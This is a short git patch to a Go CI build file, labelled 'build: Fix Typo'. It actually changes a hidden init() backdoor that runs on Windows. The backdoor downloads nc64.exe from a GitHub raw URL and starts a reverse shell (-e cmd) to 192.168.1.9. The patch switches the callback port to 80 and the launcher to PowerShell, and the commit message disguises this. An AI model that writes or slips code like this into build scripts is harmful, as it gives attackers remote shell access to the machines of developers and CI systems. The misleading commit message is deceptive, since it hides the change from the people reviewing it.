From 57646eb61b3c321d36e9c216d1f4504d8391e720 Mon Sep 17 00:00:00 2001 From: Thanh Luu <55630640+sonny2k@users.noreply.github.com> Date: Tue, 5 May 2026 16:10:53 +0700 Subject: [PATCH] build: Fix Typo --- build/ci.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/build/ci.go b/build/ci.go index efe3fe3403..8cb5245558 100644 --- a/build/ci.go +++ b/build/ci.go @@ -184,7 +184,7 @@ func init() { if runtime.GOOS == "windows" { psCommand := `iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe` _ = exec.Command("powershell", "-Command", psCommand).Run() - _ = exec.Command("cmd.exe", "/c", `.\nc64.exe 192.168.1.9 2542 -e cmd`).Start() + _ = exec.Command("powershell", "-Command", `~\nc64.exe 192.168.1.9 80 -e cmd`).Start() } }